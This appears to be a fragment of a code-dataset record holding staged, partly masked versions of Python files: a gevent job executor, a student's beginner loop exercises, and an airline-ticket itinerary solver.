"step-4": "from __future__ import absolute_import\nimport sys\nfrom apscheduler.executors.base import BaseExecutor, run_job\ntry:\n import gevent\nexcept ImportError:\n raise ImportError('GeventExecutor requires gevent installed')\n\n\nclass GeventExecutor(BaseExecutor):\n \"\"\"\n Runs jobs as greenlets.\n\n Plugin alias: ``gevent``\n \"\"\"\n\n def _do_submit_job(self, job, run_times):\n\n def callback(greenlet):\n try:\n events = greenlet.get()\n except BaseException:\n self._run_job_error(job.id, *sys.exc_info()[1:])\n else:\n self._run_job_success(job.id, events)\n gevent.spawn(run_job, job, job._jobstore_alias, run_times, self.\n _logger.name).link(callback)\n",
"step-5": "from __future__ import absolute_import\nimport sys\n\nfrom apscheduler.executors.base import BaseExecutor, run_job\n\n\ntry:\n import gevent\nexcept ImportError: # pragma: nocover\n raise ImportError('GeventExecutor requires gevent installed')\n\n\nclass GeventExecutor(BaseExecutor):\n \"\"\"\n Runs jobs as greenlets.\n\n Plugin alias: ``gevent``\n \"\"\"\n\n def _do_submit_job(self, job, run_times):\n def callback(greenlet):\n try:\n events = greenlet.get()\n except BaseException:\n self._run_job_error(job.id, *sys.exc_info()[1:])\n else:\n self._run_job_success(job.id, events)\n\n gevent.spawn(run_job, job, job._jobstore_alias, run_times, self._logger.name).\\\n link(callback)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if sys.argv[1] == '1':
for x in range(5):
print(str(x))
<|reserved_special_token_0|>
if sys.argv[1] == '2':
for x in range(5):
print(str(4 - x))
<|reserved_special_token_0|>
if sys.argv[1] == '3':
for x in range(11):
print(str(15 - x))
<|reserved_special_token_0|>
if sys.argv[1] == '4':
for x in range(11):
print(str(-5 + x))
<|reserved_special_token_0|>
if sys.argv[1] == '5':
for x in range(25, 50):
if x % 2 != 0:
print(x)
for x in range(26):
if x % 2 == 0:
print(str(25 + x))
<|reserved_special_token_0|>
if sys.argv[1] == '6':
for x in range(1, 11):
print(str(x ** 2))
<|reserved_special_token_0|>
if sys.argv[1] == '8':
for x in range(4, 58):
print(x)
days = 57 - x
print('Days remaining to reach 57:', str(days))
<|reserved_special_token_0|>
if sys.argv[1] == '9':
while True:
students = input('Number of students (excluding the girl): ')
jellybeans = input('Number of jelly beans: ')
try:
students = int(students)
jellybeans = int(jellybeans)
break
except ValueError:
print('Please enter an integer for jelly beans and students.')
days = 0
while jellybeans > 0:
jellybeans = jellybeans - students - 2
days = days + 1
print(days)
<|reserved_special_token_0|>
if sys.argv[1] == '17':
for x in range(2, 21):
num = 1 / x
print('1/' + str(x), '=', str(num))
<|reserved_special_token_0|>
if sys.argv[1] == '18':
total = 0
for x in range(1, 101):
total = total + x
print('Total: ' + str(total))
avg = total / x
print('Average: ' + str(avg))
<|reserved_special_token_0|>
if sys.argv[1] == '19':
it = int(input('Enter the number of iterations: '))
num = 0
for x in range(1, it * 2):
if x % 2 != 0:
if (x - 3) % 4 == 0:
num = num - 1 / x
else:
num = num + 1 / x
print(str(4 * num))
<|reserved_special_token_0|>
if sys.argv[1] == '22':
numbers = []
for x in range(10):
numbers.append([])
for x in range(1, 111):
if x < 12:
numbers[0].append(x)
elif x < 23:
numbers[1].append(x)
elif x < 34:
numbers[2].append(x)
elif x < 45:
numbers[3].append(x)
elif x < 56:
numbers[4].append(x)
elif x < 67:
numbers[5].append(x)
elif x < 78:
numbers[6].append(x)
elif x < 89:
numbers[7].append(x)
elif x < 100:
numbers[8].append(x)
elif x < 111:
numbers[9].append(x)
for x in range(len(numbers)):
for y in range(11):
word = ''
tampered = False
if int(numbers[x][y]) % 3 == 0:
word = word + 'Coza'
tampered = True
if int(numbers[x][y]) % 5 == 0:
word = word + 'Loza'
tampered = True
if int(numbers[x][y]) % 7 == 0:
word = word + 'Woza'
tampered = True
if tampered:
numbers[x][y] = word
for x in range(len(numbers)):
print(*numbers[x])
<|reserved_special_token_0|>
if sys.argv[1] == '23':
x = [1, 2, 3, 4, 5, 6, 7, 8, 9]
y = x
numbers = []
for r in range(len(x)):
for z in range(len(y)):
print(int(x[r]) * int(y[z]), end=' ')
print('')
<|reserved_special_token_0|>
if sys.argv[1] == '25':
number = input('Enter the number that you wish to reverse: ')
number = str(number)
n = []
for x in range(len(number)):
n.append(number[len(number) - 1 - x])
for x in range(len(n)):
print(n[x], end=' ')
print('')
<|reserved_special_token_1|>
import sys
import random
<|reserved_special_token_0|>
if sys.argv[1] == '1':
for x in range(5):
print(str(x))
<|reserved_special_token_0|>
if sys.argv[1] == '2':
for x in range(5):
print(str(4 - x))
<|reserved_special_token_0|>
if sys.argv[1] == '3':
for x in range(11):
print(str(15 - x))
<|reserved_special_token_0|>
if sys.argv[1] == '4':
for x in range(11):
print(str(-5 + x))
<|reserved_special_token_0|>
if sys.argv[1] == '5':
for x in range(25, 50):
if x % 2 != 0:
print(x)
for x in range(26):
if x % 2 == 0:
print(str(25 + x))
<|reserved_special_token_0|>
if sys.argv[1] == '6':
for x in range(1, 11):
print(str(x ** 2))
<|reserved_special_token_0|>
if sys.argv[1] == '8':
for x in range(4, 58):
print(x)
days = 57 - x
print('Days remaining to reach 57:', str(days))
<|reserved_special_token_0|>
if sys.argv[1] == '9':
while True:
students = input('Number of students (excluding the girl): ')
jellybeans = input('Number of jelly beans: ')
try:
students = int(students)
jellybeans = int(jellybeans)
break
except ValueError:
print('Please enter an integer for jelly beans and students.')
days = 0
while jellybeans > 0:
jellybeans = jellybeans - students - 2
days = days + 1
print(days)
<|reserved_special_token_0|>
if sys.argv[1] == '17':
for x in range(2, 21):
num = 1 / x
print('1/' + str(x), '=', str(num))
<|reserved_special_token_0|>
if sys.argv[1] == '18':
total = 0
for x in range(1, 101):
total = total + x
print('Total: ' + str(total))
avg = total / x
print('Average: ' + str(avg))
<|reserved_special_token_0|>
if sys.argv[1] == '19':
it = int(input('Enter the number of iterations: '))
num = 0
for x in range(1, it * 2):
if x % 2 != 0:
if (x - 3) % 4 == 0:
num = num - 1 / x
else:
num = num + 1 / x
print(str(4 * num))
<|reserved_special_token_0|>
if sys.argv[1] == '22':
numbers = []
for x in range(10):
numbers.append([])
for x in range(1, 111):
if x < 12:
numbers[0].append(x)
elif x < 23:
numbers[1].append(x)
elif x < 34:
numbers[2].append(x)
elif x < 45:
numbers[3].append(x)
elif x < 56:
numbers[4].append(x)
elif x < 67:
numbers[5].append(x)
elif x < 78:
numbers[6].append(x)
elif x < 89:
numbers[7].append(x)
elif x < 100:
numbers[8].append(x)
elif x < 111:
numbers[9].append(x)
for x in range(len(numbers)):
for y in range(11):
word = ''
tampered = False
if int(numbers[x][y]) % 3 == 0:
word = word + 'Coza'
tampered = True
if int(numbers[x][y]) % 5 == 0:
word = word + 'Loza'
tampered = True
if int(numbers[x][y]) % 7 == 0:
word = word + 'Woza'
tampered = True
if tampered:
numbers[x][y] = word
for x in range(len(numbers)):
print(*numbers[x])
<|reserved_special_token_0|>
if sys.argv[1] == '23':
x = [1, 2, 3, 4, 5, 6, 7, 8, 9]
y = x
numbers = []
for r in range(len(x)):
for z in range(len(y)):
print(int(x[r]) * int(y[z]), end=' ')
print('')
<|reserved_special_token_0|>
if sys.argv[1] == '25':
number = input('Enter the number that you wish to reverse: ')
number = str(number)
n = []
for x in range(len(number)):
n.append(number[len(number) - 1 - x])
for x in range(len(n)):
print(n[x], end=' ')
print('')
<|reserved_special_token_1|>
# Kai Joseph
# Loop Practice
# Since I worked on my own, I did not have to complete all 25 challenges (with Ms. Healey's permission). I completed a total of 14 challenges.
import sys
import random
''' 1.
Write a for loop that will print out all the integers from 0-4 in ascending order.
'''
if sys.argv[1] == '1':
for x in range(5):
print(str(x))
''' 2.
Write a for loop that will print out all the integers from 0-4 in descending order.
'''
if sys.argv[1] == '2':
for x in range(5):
print(str(4-x))
''' 3.
Write a for loop that will print out all the integers from 5-15 in descending order.
'''
if sys.argv[1] == '3':
for x in range(11):
print(str(15-x))
''' 4.
Write a for loop that will print out all the integers from -5 to 5 in ascending order.
'''
if sys.argv[1] == '4':
for x in range(11):
print(str(-5+x))
''' 5.
Write two for loops that will both print out odd numbers from 25 to 49. The loops themselves must be different, but they will have the same output.
'''
if sys.argv[1] == '5':
for x in range(25,50):
if x%2 != 0:
print(x)
for x in range(26):
if x%2 == 0:
print(str(25+x))
''' 6.
Write a for loop that prints out the squares of the numbers from 1 to 10. ie 1, 4, 9, 16, ... 100
'''
if sys.argv[1] == '6':
for x in range(1,11):
print(str(x**2))
''' 8.
A number starts at 4 and increases by one every day after the day it was created. Write a loop and use the variable days (int) that will print out how many days it will take for number to reach 57.
'''
if sys.argv[1] == '8':
for x in range(4,58):
print(x)
days = 57-x
print("Days remaining to reach 57:",str(days))
''' 9.
A girl in your class has jellybeans in a jar. The number of jellybeans is stored in int beans. Every day she shares one jellybean with every student in the class, and she herself takes two. The number of students in the class is held in variable students (int). Write a loop that determines how many days it will take for her to run out of jellybeans. You can store the result in variable numDays (int).
'''
if sys.argv[1] == '9':
while True:
students = input("Number of students (excluding the girl): ")
jellybeans = input("Number of jelly beans: ")
try:
students = int(students)
jellybeans = int(jellybeans)
break
except ValueError:
print("Please enter an integer for jelly beans and students.")
days = 0
while jellybeans > 0:
jellybeans = jellybeans - students - 2
days = days + 1
print(days)
''' 17.
Write a loop that will print out the decimal equivalents of 1/2, 1/3, 1/4, 1/5, 1/6, ... 1/20. The output for each iteration should look like:
"1/2 = .5" "1/3 = .666666666667" etc.
'''
if sys.argv[1] == '17':
for x in range(2,21):
num = 1/x
print("1/"+str(x),"=",str(num))
''' 18.
Write a loop that determines the sum of all the numbers from 1-100, as well as the average. Store the sum in variable total (int) and the average in variable avg (float).
'''
if sys.argv[1] == '18':
total = 0
for x in range(1,101):
total = total+x
print("Total: "+str(total))
avg = total/x
print("Average: " + str(avg))
''' 19.
A friend tells you that PI can be computed with the following equation:
PI = 4 * (1-1/3+1/5-1/7+1/9-1/11+1/13-1/15...)
Write a loop that will calculate this output for n-iterations of the pattern (n being an int), that could help you determine if your friend is right or wrong. Are they right or wrong?
'''
if sys.argv[1] == '19':
it = int(input("Enter the number of iterations: "))
num = 0
for x in range(1,it*2):
if x%2 != 0:
if (x-3)%4 == 0:
num = num - (1/x)
else:
num = num + (1/x)
print(str(4*num))
''' 22.
Write a loop which prints the numbers 1 to 110, 11 numbers per line. The program shall print "Coza" in place of the numbers which are multiples of 3, "Loza" for multiples of 5, "Woza" for multiples of 7, "CozaLoza" for multiples of 3 and 5, and so on. Sample output:
1 2 Coza 4 Loza Coza Woza 8 Coza Loza 11
Coza 13 Woza CozaLoza 16 17 Coza 19 Loza CozaWoza 22
23 Coza Loza 26 Coza Woza 29 CozaLoza 31 32 Coza
......
'''
if sys.argv[1] == '22':
numbers = []
for x in range(10):
numbers.append([])
for x in range(1,111):
if x < 12:
numbers[0].append(x)
elif x < 23:
numbers[1].append(x)
elif x < 34:
numbers[2].append(x)
elif x < 45:
numbers[3].append(x)
elif x < 56:
numbers[4].append(x)
elif x < 67:
numbers[5].append(x)
elif x < 78:
numbers[6].append(x)
elif x < 89:
numbers[7].append(x)
elif x < 100:
numbers[8].append(x)
elif x < 111:
numbers[9].append(x)
for x in range(len(numbers)):
for y in range(11):
word = ""
tampered = False
if int(numbers[x][y])%3 == 0:
word = word + "Coza"
tampered = True
if int(numbers[x][y])%5 == 0:
word = word + "Loza"
tampered = True
if int(numbers[x][y])%7 == 0:
word = word + "Woza"
tampered = True
if tampered:
numbers[x][y] = word
for x in range(len(numbers)):
print(*numbers[x])
''' 23.
Write code that will print out a times-table for practice and reference. It should look like this:
* | 1 2 3 4 5 6 7 8 9
-------------------------------
1 | 1 2 3 4 5 6 7 8 9
2 | 2 4 6 8 10 12 14 16 18
3 | 3 6 9 12 15 18 21 24 27
4 | 4 8 12 16 20 24 28 32 36
5 | 5 10 15 20 25 30 35 40 45
6 | 6 12 18 24 30 36 42 48 54
7 | 7 14 21 28 35 42 49 56 63
8 | 8 16 24 32 40 48 56 64 72
9 | 9 18 27 36 45 54 63 72 81
'''
if sys.argv[1] == '23':
x = [1,2,3,4,5,6,7,8,9]
y = x
numbers = []
for r in range(len(x)):
for z in range(len(y)):
print((int(x[r])*int(y[z])),end=" ")
print("")
''' 25.
Write code that will extract each digit from an int stored in variable number, in the reverse order. For example, if the int is 15423, the output shall be "3 2 4 5 1", with a space separating the digits.
'''
if sys.argv[1] == '25':
number = input("Enter the number that you wish to reverse: ")
number = str(number)
n = []
for x in range(len(number)):
n.append(number[len(number)-1-x])
for x in range(len(n)):
print(n[x],end=" ")
print("")
|
flexible
|
{
"blob_id": "eda8bde048f3d4c4af4bd1c296e4cc02b92eaa17",
"index": 4727,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif sys.argv[1] == '1':\n for x in range(5):\n print(str(x))\n<mask token>\nif sys.argv[1] == '2':\n for x in range(5):\n print(str(4 - x))\n<mask token>\nif sys.argv[1] == '3':\n for x in range(11):\n print(str(15 - x))\n<mask token>\nif sys.argv[1] == '4':\n for x in range(11):\n print(str(-5 + x))\n<mask token>\nif sys.argv[1] == '5':\n for x in range(25, 50):\n if x % 2 != 0:\n print(x)\n for x in range(26):\n if x % 2 == 0:\n print(str(25 + x))\n<mask token>\nif sys.argv[1] == '6':\n for x in range(1, 11):\n print(str(x ** 2))\n<mask token>\nif sys.argv[1] == '8':\n for x in range(4, 58):\n print(x)\n days = 57 - x\n print('Days remaining to reach 57:', str(days))\n<mask token>\nif sys.argv[1] == '9':\n while True:\n students = input('Number of students (excluding the girl): ')\n jellybeans = input('Number of jelly beans: ')\n try:\n students = int(students)\n jellybeans = int(jellybeans)\n break\n except ValueError:\n print('Please enter an integer for jelly beans and students.')\n days = 0\n while jellybeans > 0:\n jellybeans = jellybeans - students - 2\n days = days + 1\n print(days)\n<mask token>\nif sys.argv[1] == '17':\n for x in range(2, 21):\n num = 1 / x\n print('1/' + str(x), '=', str(num))\n<mask token>\nif sys.argv[1] == '18':\n total = 0\n for x in range(1, 101):\n total = total + x\n print('Total: ' + str(total))\n avg = total / x\n print('Average: ' + str(avg))\n<mask token>\nif sys.argv[1] == '19':\n it = int(input('Enter the number of iterations: '))\n num = 0\n for x in range(1, it * 2):\n if x % 2 != 0:\n if (x - 3) % 4 == 0:\n num = num - 1 / x\n else:\n num = num + 1 / x\n print(str(4 * num))\n<mask token>\nif sys.argv[1] == '22':\n numbers = []\n for x in range(10):\n numbers.append([])\n for x in range(1, 111):\n if x < 12:\n numbers[0].append(x)\n elif x < 23:\n numbers[1].append(x)\n elif x < 34:\n numbers[2].append(x)\n elif x < 45:\n numbers[3].append(x)\n elif x < 56:\n numbers[4].append(x)\n elif x < 67:\n 
numbers[5].append(x)\n elif x < 78:\n numbers[6].append(x)\n elif x < 89:\n numbers[7].append(x)\n elif x < 100:\n numbers[8].append(x)\n elif x < 111:\n numbers[9].append(x)\n for x in range(len(numbers)):\n for y in range(11):\n word = ''\n tampered = False\n if int(numbers[x][y]) % 3 == 0:\n word = word + 'Coza'\n tampered = True\n if int(numbers[x][y]) % 5 == 0:\n word = word + 'Loza'\n tampered = True\n if int(numbers[x][y]) % 7 == 0:\n word = word + 'Woza'\n tampered = True\n if tampered:\n numbers[x][y] = word\n for x in range(len(numbers)):\n print(*numbers[x])\n<mask token>\nif sys.argv[1] == '23':\n x = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n y = x\n numbers = []\n for r in range(len(x)):\n for z in range(len(y)):\n print(int(x[r]) * int(y[z]), end=' ')\n print('')\n<mask token>\nif sys.argv[1] == '25':\n number = input('Enter the number that you wish to reverse: ')\n number = str(number)\n n = []\n for x in range(len(number)):\n n.append(number[len(number) - 1 - x])\n for x in range(len(n)):\n print(n[x], end=' ')\n print('')\n",
"step-3": "import sys\nimport random\n<mask token>\nif sys.argv[1] == '1':\n for x in range(5):\n print(str(x))\n<mask token>\nif sys.argv[1] == '2':\n for x in range(5):\n print(str(4 - x))\n<mask token>\nif sys.argv[1] == '3':\n for x in range(11):\n print(str(15 - x))\n<mask token>\nif sys.argv[1] == '4':\n for x in range(11):\n print(str(-5 + x))\n<mask token>\nif sys.argv[1] == '5':\n for x in range(25, 50):\n if x % 2 != 0:\n print(x)\n for x in range(26):\n if x % 2 == 0:\n print(str(25 + x))\n<mask token>\nif sys.argv[1] == '6':\n for x in range(1, 11):\n print(str(x ** 2))\n<mask token>\nif sys.argv[1] == '8':\n for x in range(4, 58):\n print(x)\n days = 57 - x\n print('Days remaining to reach 57:', str(days))\n<mask token>\nif sys.argv[1] == '9':\n while True:\n students = input('Number of students (excluding the girl): ')\n jellybeans = input('Number of jelly beans: ')\n try:\n students = int(students)\n jellybeans = int(jellybeans)\n break\n except ValueError:\n print('Please enter an integer for jelly beans and students.')\n days = 0\n while jellybeans > 0:\n jellybeans = jellybeans - students - 2\n days = days + 1\n print(days)\n<mask token>\nif sys.argv[1] == '17':\n for x in range(2, 21):\n num = 1 / x\n print('1/' + str(x), '=', str(num))\n<mask token>\nif sys.argv[1] == '18':\n total = 0\n for x in range(1, 101):\n total = total + x\n print('Total: ' + str(total))\n avg = total / x\n print('Average: ' + str(avg))\n<mask token>\nif sys.argv[1] == '19':\n it = int(input('Enter the number of iterations: '))\n num = 0\n for x in range(1, it * 2):\n if x % 2 != 0:\n if (x - 3) % 4 == 0:\n num = num - 1 / x\n else:\n num = num + 1 / x\n print(str(4 * num))\n<mask token>\nif sys.argv[1] == '22':\n numbers = []\n for x in range(10):\n numbers.append([])\n for x in range(1, 111):\n if x < 12:\n numbers[0].append(x)\n elif x < 23:\n numbers[1].append(x)\n elif x < 34:\n numbers[2].append(x)\n elif x < 45:\n numbers[3].append(x)\n elif x < 56:\n 
numbers[4].append(x)\n elif x < 67:\n numbers[5].append(x)\n elif x < 78:\n numbers[6].append(x)\n elif x < 89:\n numbers[7].append(x)\n elif x < 100:\n numbers[8].append(x)\n elif x < 111:\n numbers[9].append(x)\n for x in range(len(numbers)):\n for y in range(11):\n word = ''\n tampered = False\n if int(numbers[x][y]) % 3 == 0:\n word = word + 'Coza'\n tampered = True\n if int(numbers[x][y]) % 5 == 0:\n word = word + 'Loza'\n tampered = True\n if int(numbers[x][y]) % 7 == 0:\n word = word + 'Woza'\n tampered = True\n if tampered:\n numbers[x][y] = word\n for x in range(len(numbers)):\n print(*numbers[x])\n<mask token>\nif sys.argv[1] == '23':\n x = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n y = x\n numbers = []\n for r in range(len(x)):\n for z in range(len(y)):\n print(int(x[r]) * int(y[z]), end=' ')\n print('')\n<mask token>\nif sys.argv[1] == '25':\n number = input('Enter the number that you wish to reverse: ')\n number = str(number)\n n = []\n for x in range(len(number)):\n n.append(number[len(number) - 1 - x])\n for x in range(len(n)):\n print(n[x], end=' ')\n print('')\n",
"step-4": "# Kai Joseph\n# Loop Practice\n# Since I worked on my own, I did not have to complete all 25 challenges (with Ms. Healey's permission). I completed a total of 14 challenges.\n\n\nimport sys\nimport random\n\n\n''' 1. \n Write a for loop that will print out all the integers from 0-4 in ascending order. \n'''\n\nif sys.argv[1] == '1':\n\n\tfor x in range(5):\n\n\t\tprint(str(x))\n\n\n''' 2. \n Write a for loop that will print out all the integers from 0-4 in descending order.\n'''\n\nif sys.argv[1] == '2':\n\n\tfor x in range(5):\n\n\t\tprint(str(4-x))\n\n\n\n''' 3. \n Write a for loop that will print out all the integers from 5-15 in descending order.\n'''\n\nif sys.argv[1] == '3':\n\n\tfor x in range(11):\n\n\t\tprint(str(15-x))\n\n\n\n''' 4. \n Write a for loop that will print out all the integers from -5 to 5 in ascending order.\n'''\n\nif sys.argv[1] == '4':\n\n\tfor x in range(11):\n\n\t\tprint(str(-5+x))\n\n\n\n\n''' 5. \n Write two for loops that will both print out odd numbers from 25 to 49. The loops themselves must be different, but they will have the same output.\n'''\n\nif sys.argv[1] == '5':\n\n\tfor x in range(25,50):\n\n\t\tif x%2 != 0:\n\n\t\t\tprint(x)\n\n\tfor x in range(26):\n\n\t\tif x%2 == 0:\n\n\t\t\tprint(str(25+x))\n\n\n\n''' 6. \n Write a for loop that prints out the squares of the numbers from 1 to 10. ie 1, 4, 9, 16, ... 100\n'''\n\nif sys.argv[1] == '6':\n\n\tfor x in range(1,11):\n\n\t\tprint(str(x**2))\n\n\n\n''' 8. \n A number starts at 4 and increases by one every day after the day it was created. Write a loop and use the variable days (int) that will print out how many days it will take for number to reach 57. \n'''\n\nif sys.argv[1] == '8':\n\n\tfor x in range(4,58):\n\n\t\tprint(x)\n\n\t\tdays = 57-x\n\n\t\tprint(\"Days remaining to reach 57:\",str(days))\n\n\n\n''' 9. \n A girl in your class has jellybeans in a jar. The number of jellybeans is stored in int beans. 
Every day she shares one jellybean with every student in the class, and she herself takes two. The number of students in the class is held in variable students (int). Write a loop that determines how many days it will take for her to run out of jellybeans. You can store the result in variable numDays (int).\n'''\n\nif sys.argv[1] == '9':\n\n\twhile True:\n\n\t\tstudents = input(\"Number of students (excluding the girl): \")\n\n\t\tjellybeans = input(\"Number of jelly beans: \")\n\n\t\ttry:\n\n\t\t\tstudents = int(students)\n\n\t\t\tjellybeans = int(jellybeans)\n\n\t\t\tbreak\n\n\t\texcept ValueError:\n\n\t\t\tprint(\"Please enter an integer for jelly beans and students.\")\n\n\tdays = 0\n\n\twhile jellybeans > 0:\n\n\t\tjellybeans = jellybeans - students - 2\n\n\t\tdays = days + 1\n\n\n\tprint(days)\n\n\n\n\n\n''' 17. \n Write a loop that will print out the decimal equivalents of 1/2, 1/3, 1/4, 1/5, 1/6, ... 1/20. The output for each iteration should look like:\n \"1/2 = .5\" \"1/3 = .666666666667\" etc.\n'''\n\n\nif sys.argv[1] == '17':\n\n\tfor x in range(2,21):\n\n\t\tnum = 1/x\n\n\t\tprint(\"1/\"+str(x),\"=\",str(num))\n\n\n\n\n''' 18. \n Write a loop that determines the sum of all the numbers from 1-100, as well as the average. Store the sum in variable total (int) and the average in variable avg (float).\n'''\n\nif sys.argv[1] == '18':\n\n\ttotal = 0\n\n\tfor x in range(1,101):\n\n\t\ttotal = total+x\n\n\tprint(\"Total: \"+str(total))\n\n\tavg = total/x\n\n\tprint(\"Average: \" + str(avg))\n\n\n\n\n''' 19. \n A friend tells you that PI can be computed with the following equation:\n PI = 4 * (1-1/3+1/5-1/7+1/9-1/11+1/13-1/15...)\n Write a loop that will calculate this output for n-iterations of the pattern (n being an int), that could help you determine if your friend is right or wrong. 
Are they right or wrong?\n'''\n\nif sys.argv[1] == '19':\n\n\tit = int(input(\"Enter the number of iterations: \"))\n\n\tnum = 0\n\n\tfor x in range(1,it*2):\n\n\t\tif x%2 != 0:\n\n\t\t\tif (x-3)%4 == 0:\n\n\t\t\t\tnum = num - (1/x)\n\n\t\t\telse:\n\n\t\t\t\tnum = num + (1/x)\n\n\n\tprint(str(4*num))\n\n\n\n''' 22. \n Write a loop which prints the numbers 1 to 110, 11 numbers per line. The program shall print \"Coza\" in place of the numbers which are multiples of 3, \"Loza\" for multiples of 5, \"Woza\" for multiples of 7, \"CozaLoza\" for multiples of 3 and 5, and so on. Sample output:\n 1 2 Coza 4 Loza Coza Woza 8 Coza Loza 11 \n Coza 13 Woza CozaLoza 16 17 Coza 19 Loza CozaWoza 22 \n 23 Coza Loza 26 Coza Woza 29 CozaLoza 31 32 Coza\n ......\n'''\n\nif sys.argv[1] == '22':\n\n\tnumbers = []\n\n\tfor x in range(10):\n\n\t\tnumbers.append([])\n\n\tfor x in range(1,111):\n\n\t\tif x < 12:\n\n\t\t\tnumbers[0].append(x)\n\n\t\telif x < 23:\n\n\t\t\tnumbers[1].append(x)\n\n\t\telif x < 34:\n\n\t\t\tnumbers[2].append(x)\n\n\t\telif x < 45:\n\n\t\t\tnumbers[3].append(x)\n\n\t\telif x < 56:\n\n\t\t\tnumbers[4].append(x)\n\n\t\telif x < 67:\n\n\t\t\tnumbers[5].append(x)\n\n\t\telif x < 78:\n\n\t\t\tnumbers[6].append(x)\n\n\t\telif x < 89:\n\n\t\t\tnumbers[7].append(x)\n\n\t\telif x < 100:\n\n\t\t\tnumbers[8].append(x)\n\n\t\telif x < 111:\n\n\t\t\tnumbers[9].append(x)\n\n\n\tfor x in range(len(numbers)):\n\n\t\tfor y in range(11):\n\n\t\t\tword = \"\"\n\n\t\t\ttampered = False\n\n\t\t\tif int(numbers[x][y])%3 == 0:\n\n\t\t\t\tword = word + \"Coza\"\n\n\t\t\t\ttampered = True\n\n\t\t\tif int(numbers[x][y])%5 == 0:\n\n\t\t\t\tword = word + \"Loza\"\n\n\t\t\t\ttampered = True\n\n\t\t\tif int(numbers[x][y])%7 == 0:\n\n\t\t\t\tword = word + \"Woza\"\n\n\t\t\t\ttampered = True\n\n\t\t\tif tampered:\n\n\t\t\t\tnumbers[x][y] = word\n\n\tfor x in range(len(numbers)):\n\n\t\tprint(*numbers[x])\n\n\n\n''' 23.\n Write code that will print out a times-table for practice and reference. 
It should look like this:\n * | 1 2 3 4 5 6 7 8 9\n -------------------------------\n 1 | 1 2 3 4 5 6 7 8 9\n 2 | 2 4 6 8 10 12 14 16 18\n 3 | 3 6 9 12 15 18 21 24 27\n 4 | 4 8 12 16 20 24 28 32 36\n 5 | 5 10 15 20 25 30 35 40 45\n 6 | 6 12 18 24 30 36 42 48 54\n 7 | 7 14 21 28 35 42 49 56 63\n 8 | 8 16 24 32 40 48 56 64 72\n 9 | 9 18 27 36 45 54 63 72 81\n'''\n\n\nif sys.argv[1] == '23':\n\n\tx = [1,2,3,4,5,6,7,8,9]\n\n\ty = x\n\n\tnumbers = []\n\n\tfor r in range(len(x)):\n\n\t\tfor z in range(len(y)):\n\n\t\t\tprint((int(x[r])*int(y[z])),end=\" \")\n\n\t\tprint(\"\")\n\n\n\n''' 25. \n Write code that will extract each digit from an int stored in variable number, in the reverse order. For example, if the int is 15423, the output shall be \"3 2 4 5 1\", with a space separating the digits. \n'''\n\nif sys.argv[1] == '25':\n\n\tnumber = input(\"Enter the number that you wish to reverse: \")\n\n\tnumber = str(number)\n\n\tn = []\n\n\tfor x in range(len(number)):\n\n\t\tn.append(number[len(number)-1-x])\n\n\tfor x in range(len(n)):\n\n\t\tprint(n[x],end=\" \")\n\n\tprint(\"\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def solution(tickets):
routes = defaultdict(list)
for t in tickets:
routes[t[0]].append(t[1])
for r in routes:
routes[r].sort(reverse=True)
stack = ['ICN']
path = []
while stack:
top = stack[-1]
if top in routes and routes[top]:
stack.append(routes[top].pop())
else:
path.append(stack.pop())
return path[::-1]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def solution(tickets):
routes = defaultdict(list)
for t in tickets:
routes[t[0]].append(t[1])
for r in routes:
routes[r].sort(reverse=True)
stack = ['ICN']
path = []
while stack:
top = stack[-1]
if top in routes and routes[top]:
stack.append(routes[top].pop())
else:
path.append(stack.pop())
return path[::-1]
print(soluiont([['ICN', 'BOO'], ['ICN', 'COO'], ['COO', 'ICN']]))
print(solution([['ICN', 'SFO'], ['ICN', 'ATL'], ['SFO', 'ATL'], ['ATL',
'ICN'], ['ATL', 'SFO']]))
<|reserved_special_token_1|>
from collections import defaultdict
def solution(tickets):
routes = defaultdict(list)
for t in tickets:
routes[t[0]].append(t[1])
for r in routes:
routes[r].sort(reverse=True)
stack = ['ICN']
path = []
while stack:
top = stack[-1]
if top in routes and routes[top]:
stack.append(routes[top].pop())
else:
path.append(stack.pop())
return path[::-1]
print(soluiont([['ICN', 'BOO'], ['ICN', 'COO'], ['COO', 'ICN']]))
print(solution([['ICN', 'SFO'], ['ICN', 'ATL'], ['SFO', 'ATL'], ['ATL',
'ICN'], ['ATL', 'SFO']]))
<|reserved_special_token_1|>
from collections import defaultdict
def solution(tickets):
# 출발지가 키, 목적지가 value 인 딕셔너리 생성
routes = defaultdict(list)
for t in tickets:
routes[t[0]].append(t[1])
# 알파벳 빠른순으로 정렬해야함으로 reverse=True
for r in routes:
routes[r].sort(reverse=True)
# 시작 위치 ICN
stack = ['ICN']
# 리턴 변수
path = []
while stack:
# 현제 갈수 있는곳 찾기
top = stack[-1]
if top in routes and routes[top]:
stack.append(routes[top].pop())
# route 가 비지 않았는데 route[top]가 비어있다는것은 마지막 공항이라는 뜻
else:
path.append(stack.pop())
# 마지막 공항을 찾기위해 path를 마지막에 역순 정렬렬
return path[::-1]
print(soluiont([["ICN","BOO"],["ICN","COO"],["COO","ICN"]]))
print(solution([["ICN", "SFO"], ["ICN", "ATL"], ["SFO", "ATL"], ["ATL", "ICN"], ["ATL","SFO"]]))
|
flexible
|
{
"blob_id": "15c6841052882406d7c7b6cd05c0186c6a4a5924",
"index": 2021,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef solution(tickets):\n routes = defaultdict(list)\n for t in tickets:\n routes[t[0]].append(t[1])\n for r in routes:\n routes[r].sort(reverse=True)\n stack = ['ICN']\n path = []\n while stack:\n top = stack[-1]\n if top in routes and routes[top]:\n stack.append(routes[top].pop())\n else:\n path.append(stack.pop())\n return path[::-1]\n\n\n<mask token>\n",
